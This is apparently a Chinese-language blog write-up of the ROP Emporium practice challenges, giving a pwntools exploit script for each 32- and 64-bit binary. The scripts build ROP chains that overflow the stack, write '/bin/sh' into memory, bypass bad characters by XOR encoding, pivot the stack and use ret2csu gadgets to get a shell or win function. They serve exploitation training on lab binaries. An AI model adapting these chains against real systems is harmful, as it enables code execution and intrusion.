0%

Rop_Emporium

alt

最近在学习ROP,发现ROP Emporium这个网站上题目挺好,就一直在做,我这里用到查gadget的工具是ROPgadget,其他工具也是可以的。

ret2win_32

简单的覆盖返回地址跳转到后门函数

1
2
3
4
5
6
7
8
9
#coding="utf-8"
from pwn import *

sh=process("./ret2win32")
payload="a"*0x28+"a"*4+"\x59\x86\x04\x08"
sh.recvuntil(">")

sh.sendline(payload)
sh.interactive()

ret2win_64

和32位一样,覆盖返回地址跳转到后门函数

1
2
3
4
5
6
7
from pwn import *

sh=process("./ret2win")
payload="a"*0x20+"a"*8+p64(0x0400811)
sh.recvuntil(">")
sh.sendline(payload)
sh.interactive()

split_32

程序的system中不是/bin/sh,通过查找字符串发现在数据段,将参数数据段参数传递给system就ok了

1
2
3
4
5
6
7
from pwn import *

sh=process("./split32")
payload="a"*0x28+"a"*4+p32(0x08048657)+p32(0x0804a030)
sh.recvuntil(">")
sh.sendline(payload)
sh.interactive()

split_64

64位和32位有点不一样,在传参方面64位前几个参数是放在rdi,rsi,rdx,rcx,r8,r9中,所以需要将参数放到rdi中才可以调用成功

1
2
3
4
5
6
7
8
9
10
11
12
#coding="utf-8"
from pwn import *

sh=process("./split")
system_addr=0x0400810
rdi_addr=0x0400883
flag_addr=0x0601060
payload='a'*0x20+'a'*0x8+p64(rdi_addr)+p64(flag_addr)+p64(system_addr)
#当程序ret时,进入rdi_addr,然后rdi再ret到system_addr每一次esp指向都不一样
sh.recvuntil(">")
sh.sendline(payload)
sh.interactive()

callme_32

程序中没有system和/bin/sh,给了一个.so文件,用IDA查看发现程序通过callme_one函数将flag文件导入,通过callme_two和callme_three函数将flag解密输出,这三个函数还需要在0x1,0x2,0x3这三个参数,由于.so文件相当于在调用动态链接库,没有办法esp自减,所以我们利用程序中的gadget来平衡一下栈

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#coding="utf-8"

from pwn import *

sh=process("./callme32")
callme_one_addr=0x080485c0
callme_two_addr=0x08048620
callme_three_addr=0x080485b0
gadget_addr=0x080488a9
payload="a"*0x28+"a"*4
payload+=p32(callme_one_addr)+p32(gadget_addr)+p32(0x1)+p32(0x2)+p32(0x3)
payload+=p32(callme_two_addr)+p32(gadget_addr)+p32(0x1)+p32(0x2)+p32(0x3)
payload+=p32(callme_three_addr)+p32(gadget_addr)+p32(0x1)+p32(0x2)+p32(0x3)
sh.recvuntil(">")
sh.sendline(payload)
sh.interactive()

callme_64

和32基本一样,注意传参问题就好

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#coding="utf-8"

from pwn import *

sh=process("./callme")
gadget_addr=0x0401ab0
callme_one_addr=0x0401850
callme_two_addr=0x0401870
callme_three_addr=0x0401810
payload="a"*0x20+"a"*0x8
payload+=p64(gadget_addr)+p64(0x1)+p64(0x2)+p64(0x3)+p64(callme_one_addr)
payload+=p64(gadget_addr)+p64(0x1)+p64(0x2)+p64(0x3)+p64(callme_two_addr)
payload+=p64(gadget_addr)+p64(0x1)+p64(0x2)+p64(0x3)+p64(callme_three_addr)
sh.recvuntil(">")
sh.sendline(payload)
sh.interactive()

write4_32

程序中只有system函数,没有我们需要的/bin/sh,需要我们自己构造,但是我们要向将自己构造的写入到程序,就要知道程序bss段或者data段是否可写,以及他们的空间是否足够。另外需要注意的是,我们这里是 32 位程序,每次只能写入 4 个字节,所以要分成两次写入,还得注意字符对齐,有没有截断字符( \x00 , \x0a 等)之类的问
题,比如这里 /bin/sh 只有七个字节,我们可以使用 /bin/sh\x00 或者/bin//sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#coding="uft-8"

from pwn import *

sh=process("./write432")
system_addr=0x0804865a #system_plt_addr=0x08048430
pop_pop_addr=0x080486da
mov_addr=0x08048670
data_addr=0x0804a028

payload="a"*0x28+"a"*4
payload+=p32(pop_pop_addr)+p32(data_addr)+"/bin"+p32(mov_addr)
payload+=p32(pop_pop_addr)+p32(data_addr+4)+"//sh"+p32(mov_addr)

#payload+=p32(pop_pop_addr)+p32(data_addr+4)+"/sh\x00"+p32(mov_addr)

payload+=p32(system_addr)+p32(data_addr) #p32(system_plt_addr)

sh.recvuntil(">")
sh.sendline(payload)
sh.interactive()

write4_64

64位一次写入就好了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#coding="utf-8"

from pwn import *

sh=process("./write4")
system_plt_addr=0x04005e0
data_addr=0x0601050
mov_ret_addr=0x0400820
pop_pop_addr=0x0400890
pop_rdi_addr=0x0400893

payload="a"*0x20+"a"*0x8
payload+=p64(pop_pop_addr)+p64(data_addr)+"/bin/sh\x00"+p64(mov_ret_addr)
payload+=p64(pop_rdi_addr)+p64(data_addr)+p64(system_plt_addr)

sh.recvuntil(">")
sh.sendline(payload)
sh.interactive()

badchars_32

我们依然要将 /bin/sh 写入到进程内存中,但这一次程序在读取,输入时会对敏感字符进行检查。处理敏感字符在利用开发中是经常要用到的,不仅仅是要对参数进行编码,有时甚至地址也要如此。这里我们使用简单的异或操作来对字符串编码和解码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#coding="utf-8"

from pwn import *

sh=process("./badchars32")

pop_ebx_ecx_addr=0x08048896
pop_esi_edi_addr=0x08048899
mov_edi_esi_addr=0x08048893
xor_addr=0x08048890
system_plt_addr=0x080484e0
bss_addr=0x0804a040
#encode
binsh=""
xor_byte=0x2

for i in "/bin/sh\x00":
c=ord(i) ^ xor_byte
binsh+=chr(c)
#write
payload="a"*44
payload+=p32(pop_esi_edi_addr)+binsh[0:4]+p32(bss_addr)+p32(mov_edi_esi_addr)
payload+=p32(pop_esi_edi_addr)+binsh[4:8]+p32(bss_addr+4)+p32(mov_edi_esi_addr)
#code
for i in range(len(binsh)):
payload+=p32(pop_ebx_ecx_addr)
payload+=p32(bss_addr+i)
payload+=p32(xor_byte)
payload+=p32(xor_addr)

payload+=p32(system_plt_addr)+"a"*0x4+p32(bss_addr)

sh.recvuntil(">")
sh.sendline(payload)
sh.interactive()

badchars_64

和32位一样,就是这次可以一次传参了,需要注意的就是传参问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#coding="utf-8"

from pwn import *

sh=process("./badchars")
elf=ELF('./badchars')
system_plt_addr=0x004006f0
bss_addr=0x0000000000601080 //本来想用data段的,但是不知道为什么data段地址就是不对,服服服。。。
mov_r13_r12_addr=0x0400b34
pop_r12_r13_addr=0x0400b3b
pop_r14_r15_addr=0x0400b40
xor_r15_r14_addr=0x0400b30
pop_rdi_addr=0x0400b39


xor_byte=0x1
badchars=[0x62,0x69,0x63,0x2f,0x20,0x66,0x6e,0x73]

while(1):
binsh=""
for i in "/bin/sh\x00":
c=ord(i) ^ xor_byte
if c in badchars:
xor_byte+=1
break
else:
binsh+=chr(c)
if len(binsh)==8:
break

payload="a"*0x20+"a"*0x8
payload+=p64(pop_r12_r13_addr)+binsh+p64(bss_addr)+p64(mov_r13_r12_addr)

for i in range(len(binsh)):
payload+=p64(pop_r14_r15_addr)
payload+=p64(xor_byte)
payload+=p64(bss_addr+i)
payload+=p64(xor_r15_r14_addr)

payload+=p64(pop_rdi_addr)+p64(bss_addr)+p64(system_plt_addr)

sh.recvuntil(">")
sh.sendline(payload)
sh.interactive()

fluff_32

和前面的一样但是程序这次的gadget确实有点难利用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
#coding="utf-8"

from pwn import *

sh=process("./fluff32")

system_plt_addr=0x08048430
bss_addr=0x0804a040
mov_edx_addr=0x0804868c
pop_ebx_addr=0x080483e1
xor_edx_ebx=0x0804867b
xchg_edx_ecx=0x08048689
mov_ecx_edx=0x08048693


payload="a"*44

#addr->ecx ##先将程序通过异或来放到edx中,然后在解密放到ecx中

payload+=p32(mov_edx_addr)
payload+=p32(pop_ebx_addr)
payload+=p32(bss_addr)
payload+=p32(xor_edx_ebx)
payload+=p32(0)
payload+=p32(pop_ebx_addr)
payload+=p32(0xdefaced0)
payload+=p32(xor_edx_ebx)
payload+=p32(0)
payload+=p32(xchg_edx_ecx)
payload+=p32(0)

#data->edx #先将程序通过异或来放到edx中,然后再把edx中的解密

payload+=p32(pop_ebx_addr)
payload+="/bin"
payload+=p32(xor_edx_ebx)
payload+=p32(0)
payload+=p32(pop_ebx_addr)
payload+=p32(0xdefaced0)
payload+=p32(xor_edx_ebx)
payload+=p32(0)
payload+=p32(mov_ecx_edx)
payload+=p32(0)
payload+=p32(0)

#addr->ecx #和上面一样,32位需要俩次才能把参数传完

payload+=p32(mov_edx_addr)
payload+=p32(pop_ebx_addr)
payload+=p32(bss_addr+4)
payload+=p32(xor_edx_ebx)
payload+=p32(0)
payload+=p32(pop_ebx_addr)
payload+=p32(0xdefaced0)
payload+=p32(xor_edx_ebx)
payload+=p32(0)
payload+=p32(xchg_edx_ecx)
payload+=p32(0)
#data->edx
payload+=p32(pop_ebx_addr)
payload+="/sh\x00"
payload+=p32(xor_edx_ebx)
payload+=p32(0)
payload+=p32(pop_ebx_addr)
payload+=p32(0xdefaced0)
payload+=p32(xor_edx_ebx)
payload+=p32(0)
payload+=p32(mov_ecx_edx)
payload+=p32(0)
payload+=p32(0)

payload+=p32(system_plt_addr)+p32(0)+p32(bss_addr)

sh.recvuntil(">")
sh.sendline(payload)
sh.interactive()

感觉自己写的好麻烦,还需要异或俩次才可以,后来看了别人的wp发现,直接xor edx,edx 就不用第二次异或了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
#coding="utf-8"
from pwn import *

sh=process("./fluff32")
#elf=ELF("./fluff32") #换成这样也可以
system_plt_addr=0x08048430 # system_plt_addr=elf.plt['system']
bss_addr=0x0804a040 # bss_addr=elf.bss()
pop_ebx_addr=0x080483e1
xor_edx_ebx=0x0804867b
xchg_edx_ecx=0x08048689
mov_ecx_edx=0x08048693
xor_edx_edx=0x08048671


payload="a"*44
#addr->ecx
payload+=p32(xor_edx_edx)
payload+=p32(0)
payload+=p32(pop_ebx_addr)
payload+=p32(bss_addr)
payload+=p32(xor_edx_ebx)
payload+=p32(0)
payload+=p32(xchg_edx_ecx)
payload+=p32(0)


#data->edx
payload+=p32(xor_edx_edx)
payload+=p32(0)
payload+=p32(pop_ebx_addr)
payload+="/bin"
payload+=p32(xor_edx_ebx)
payload+=p32(0)
payload+=p32(mov_ecx_edx)
payload+=p32(0)
payload+=p32(0)

#addr->ecx
payload+=p32(xor_edx_edx)
payload+=p32(0)
payload+=p32(pop_ebx_addr)
payload+=p32(bss_addr+4)
payload+=p32(xor_edx_ebx)
payload+=p32(0)
payload+=p32(xchg_edx_ecx)
payload+=p32(0)


#data->edx
payload+=p32(xor_edx_edx)
payload+=p32(0)
payload+=p32(pop_ebx_addr)
payload+="/sh\x00"
payload+=p32(xor_edx_ebx)
payload+=p32(0)
payload+=p32(mov_ecx_edx)
payload+=p32(0)
payload+=p32(0)


payload+=p32(system_plt_addr)+p32(0)+p32(bss_addr)

sh.recvuntil(">")
sh.sendline(payload)
sh.interactive()

fluff_64

用老方法查看gadget没找到合适的。。。 然后wp上说要加上 –depth ,加上以后就找到了 _

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
#coding="uft-8"

from pwn import *

sh=process("./fluff")
elf=ELF("./fluff")
system_plt_addr=elf.plt['system']
bss_addr=elf.bss()
xor_r11_r11_addr=0x0000000000400822
pop_r12_addr=0x0000000000400832
xor_r11_r12_addr=0x000000000040082f
xchg_r11_r10_addr=0x0000000000400840
mov_r10_r11_addr=0x000000000040084e
pop_rdi_addr=0x00000000004008c3


#addr->r10

payload="a"*0x20+"a"*0x8
payload+=p64(xor_r11_r11_addr)
payload+=p64(0)
payload+=p64(pop_r12_addr)
payload+=p64(bss_addr)
payload+=p64(xor_r11_r12_addr)
payload+=p64(0)
payload+=p64(xchg_r11_r10_addr)
payload+=p64(0)

#data->r11

payload+=p64(xor_r11_r11_addr)
payload+=p64(0)
payload+=p64(pop_r12_addr)
payload+="/bin/sh\x00"
payload+=p64(xor_r11_r12_addr)
payload+=p64(0)
payload+=p64(mov_r10_r11_addr)
payload+=p64(0)
payload+=p64(0)

payload+=p64(pop_rdi_addr)+p64(bss_addr)+p64(system_plt_addr)

sh.recvuntil(">")
sh.sendline(payload)
sh.interactive()

pivot_32

感觉难度突然增加,有点绝望,果然pwn还是很难,这题呢主要考察俩个点,一个是栈的迁移,一个是泄露目标函数的地址,这里我用了俩种方法写,大同小异而已

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
from pwn import *
context.log_level='debug'
sh=process("./pivot32")
elf=ELF("./pivot32")
libc_elf=ELF("./libpivot32.so")

foothold_function_plt_addr=elf.plt['foothold_function']
foothold_function_got_addr=elf.got['foothold_function']
foothold_function_sym=libc_elf.symbols['foothold_function']
ret2win_sym=libc_elf.symbols['ret2win']
offset=int(ret2win_sym-foothold_function_sym)

leave_ret=0x080486a8
mov_eax_eax_addr=0x080488c4
pop_eax_addr=0x080488c0
pop_ebx_addr=0x08048571
add_eax_ebx_addr=0x080488c7
call_eax=0x080486a3

sh.recvuntil("The Old Gods kindly bestow upon you a place to pivot: ")
fake_ebp=int(sh.recv(10),16)

payload1=p32(0)
payload1+=p32(foothold_function_plt_addr)
payload1+=p32(pop_eax_addr)
payload1+=p32(foothold_function_got_addr)
payload1+=p32(mov_eax_eax_addr)
payload1+=p32(pop_ebx_addr)
payload1+=p32(offset)
payload1+=p32(add_eax_ebx_addr)
payload1+=p32(call_eax)

sh.recvuntil(">")
sh.sendline(payload1)

payload2="a"*40
payload2+=p32(fake_ebp)
payload2+=p32(leave_ret)

sh.recvuntil(">")
sh.sendline(payload2)
sh.interactive()

第二种方法就是将esp部分也用gadget表示,不用再向第一种一样伪造一个堆栈了,也就是说不用管ebp的值了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
from pwn import *
context.log_level='debug'
sh=process("./pivot32")
elf=ELF("./pivot32")
libc_elf=ELF("./libpivot32.so")

foothold_function_plt_addr=elf.plt['foothold_function']
foothold_function_got_addr=elf.got['foothold_function']
foothold_function_sym=libc_elf.symbols['foothold_function']
ret2win_sym=libc_elf.symbols['ret2win']
offset=int(ret2win_sym-foothold_function_sym)

mov_eax_eax_addr=0x080488c4
pop_eax_addr=0x080488c0
pop_ebx_addr=0x08048571
add_eax_ebx_addr=0x080488c7
call_eax=0x080486a3
pop_eax=0x080488c0
xchg_eax_esp=0x080488c2
sh.recvuntil("The Old Gods kindly bestow upon you a place to pivot: ")
fake_ebp=int(sh.recv(10),16)


payload1=p32(foothold_function_plt_addr)
payload1+=p32(pop_eax_addr)
payload1+=p32(foothold_function_got_addr)
payload1+=p32(mov_eax_eax_addr)
payload1+=p32(pop_ebx_addr)
payload1+=p32(offset)
payload1+=p32(add_eax_ebx_addr)
payload1+=p32(call_eax)

sh.recvuntil(">")
sh.sendline(payload1)

payload2="a"*40+"a"*4
payload2+=p32(pop_eax)
payload2+=p32(fake_ebp)
payload2+=p32(xchg_eax_esp)

sh.recvuntil(">")
sh.sendline(payload2)
sh.interactive()

pivot_64

这个题和32位的第二种方法一样,本来想用第一种方法的,但是在搜索leave;ret 的gadget时发现都存在0a截断,需要将0a变为其他字符,最后再用寄存器变成0a,程序第二次输入被限制了,我找了几个gadget发现输入都不够。还是自己太菜了 呜呜呜~

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#coding='utf-8'

from pwn import *
context.log_level='debug'
sh=process("./pivot")
elf=ELF("./pivot")
lib_elf=ELF("./libpivot.so")

fun_plt_addr=elf.plt['foothold_function']
fun_got_addr=elf.got['foothold_function']
fun_sym=lib_elf.symbols['foothold_function']
ret2win_sym=lib_elf.symbols['ret2win']
offset=int(ret2win_sym-fun_sym)

sh.recvuntil("The Old Gods kindly bestow upon you a place to pivot: ")
heap_addr=int(sh.recv(14),16)

mov_rax_rax=0x0000000000400b05
pop_rax=0x0000000000400b00
xchg_rax_rsp=0x0000000000400b02
call_rax=0x000000000040098e
add_rax_rbp=0x0000000000400b09
pop_rbp=0x0000000000400900

payload1=p64(fun_plt_addr)+p64(pop_rax)+p64(fun_got_addr)
payload1+=p64(mov_rax_rax)+p64(pop_rbp)+p64(offset)+p64(add_rax_rbp)
payload1+=p64(call_rax)

payload2='b'*40+p64(pop_rax)+p64(heap_addr)+p64(xchg_rax_rsp)

sh.recvuntil(">")
sh.sendline(payload1)

sh.recvuntil(">")
sh.sendline(payload2)
sh.interactive()

ret2csu_64

学到这里说明你已经将初级ROP学完了,这道题看似特别简单,只要找一个rdx的gadget将程序规定的参数传进去就好了,但是你会发现rdx的gadget找不到。程序在运行时,都会调用libc,__libc_csu_init这个函数时一个初始化函数,看一下他的反汇编发现,我们可以调用他的某些gadget来给rdx赋值。但是我们在调用的时候需要call一个函数,一开始我想要call ret2win,但是因为我们需要ret2win的指针所以没有成功。我们需要一个不改变任何寄存器的值,或者不改变rdx的值的函数,文章中说_init这个函数不会改变rdx的值,所以就用它了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#coding='utf-8'

from pwn import *

sh=process('./ret2csu')
#elf=ELF('./ret2csu')
#context.log_level='debug'

ret2win=0x00000000004007b1
gadget_one=0x000000000040089a
gadget_two=0x0000000000400880
init_por=0x600e38
rdx=0xdeadcafebabebeef

payload='a'*0x20+'a'*8
payload+=p64(gadget_one)
payload+=p64(0)
payload+=p64(0x01)
payload+=p64(init_por)
payload+=p64(0)
payload+=p64(0)
payload+=p64(rdx)
payload+=p64(gadget_two)


payload+='a'*56
payload+=p64(ret2win)

sh.recvuntil('>')
sh.send(payload)
sh.interactive()

判断异或数是多少可以绕过。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
binsh = '/bin/sh\x00'
badchar = [98, 105, 99, 47, 32, 102, 110, 115]
xornum = 1
while 1:
for x in binsh:
tmp = ord(x) ^ xornum
if tmp in badchar:
xornum += 1
break
if x == "\x00":
print (xornum)
xornum +=1
if xornum == 10:
break